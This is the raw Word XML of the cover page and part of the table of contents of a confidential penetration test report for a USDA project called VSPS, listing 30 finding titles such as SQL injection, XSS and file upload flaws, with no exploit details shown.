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80C0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:spacing w:before="2000"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F2E310C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:after="600"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A1C7766" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SECURITY ASSESSMENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011D35F6" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>PENETRATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ABD0CB" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="400"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>TEST REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5275DEF4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="1000"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="64748B"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>VSPS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6"/>
        <w:gridCol w:w="2256"/>
        <w:gridCol w:w="2257"/>
        <w:gridCol w:w="2257"/>
      </w:tblGrid>
      <w:tr w:rsidR="009B7CCA" w14:paraId="4F503BA2" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1E293B"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0EF70877" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>30 TOTAL FINDINGS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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360C7E32" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>5 CRITICAL</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18520A26" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>19 HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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1E5C204F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>5 MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="540C93E3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:spacing w:before="8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64"/>
        <w:gridCol w:w="4062"/>
      </w:tblGrid>
      <w:tr w:rsidR="009B7CCA" w14:paraId="3E42DD6A" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2750" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="019243BC" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">PREPARED FOR USDA </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>MRP  PROJECT</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> VSPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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3D35B9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">PREPARED BY </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>FC  DATE</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> 2025-11-24 - 2025-12-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2634FD55" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2000"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CONFIDENTIAL &amp; PROPRIETARY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E766D7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This document contains sensitive security information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D613274" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D958A5" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112A76E1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">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21"/>
        <w:gridCol w:w="1805"/>
      </w:tblGrid>
      <w:tr w:rsidR="009B7CCA" w14:paraId="66E2CDEF"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1F4D69" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1. Document Control</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CE98D69" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="45D7C3AF"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6032D08" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2. Scope of Engagement</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2E35243" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="1DEF7CB2"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7AE745" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3. Executive Summary</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06FB9C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="45A72057"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8F829F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>4. Risk Assessment</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792CBF4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="2CDBEA44"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907522" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5. Findings Summary</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EA76CA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="33DD726A"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BB7061A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>6. Detailed Findings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71CD4B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>6+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="22282BBD"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7B20E0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1. Unrestricted Upload of File with Dangerous Type</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A91F71" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="40DCBD61"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A22A489" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2. Missing Authorization for Sensitive Action (Email ...</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0F026C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="44E513A3"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5A0B66" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3. Unauthenticated Arbitrary File Upload (CVE-2018-92...</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744E19" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="442A3375"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2F261D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4. SQL Injection - Time-Based Blind</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2D5EE77" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="77082BE1"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204DC62" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5. Blind Cross-Site Scripting (XSS)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875D04" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="7BFC4487"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F88573E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6. Missing Rate Limiting</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87ACC7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="2C0504C4"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7DDE129" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7. Unrestricted File Upload and Lack of Rate Limiting</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13ADF3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="68DE6B49"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794A39A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">8. Cross-Origin Resource Sharing (CORS) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Misconfigurat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>...</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5520F6" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="557FB7DE"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C6BB58" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9. Stored Cross-Site Scripting (XSS)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0DE10E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="3D0D08B9"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FBD9B10" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10. Stored Cross-Site Scripting (XSS)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7F27F5E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="7CF456C2"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814774D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>11. Stored Cross-Site Scripting (XSS)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319380" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="5CE35D88"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4B158B2" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12. Stored Cross-Site Scripting (XSS)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2A48731" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="010713D2"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988187B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>13. Host Header Injection</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51FD3A5" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="2112C392"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901F95" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14. Vulnerable and Outdated JavaScript Library (jQuery...</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1844C3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="102AD7A4"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E58836" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15. Vulnerable and Outdated JavaScript Library (jQuery...</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A76717" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="706B875F"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9F72D6" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>16. Information Disclosure via Directory Listing of Se...</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0567CA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="27EA8F03"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835434B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17. Stored Cross-Site Scripting (XSS)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6370C8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="7D2A51F0"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7D1E35" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>18. Lack of Malware Scanning for Uploaded Files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6FCD955" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="664B102E"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967001" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>19. Improper HTTP Method Enforcement</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53AE1B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="1C7486D2"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8B8B4C3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">20. Missing Cross-Site Request Forgery (CSRF) </w:t>
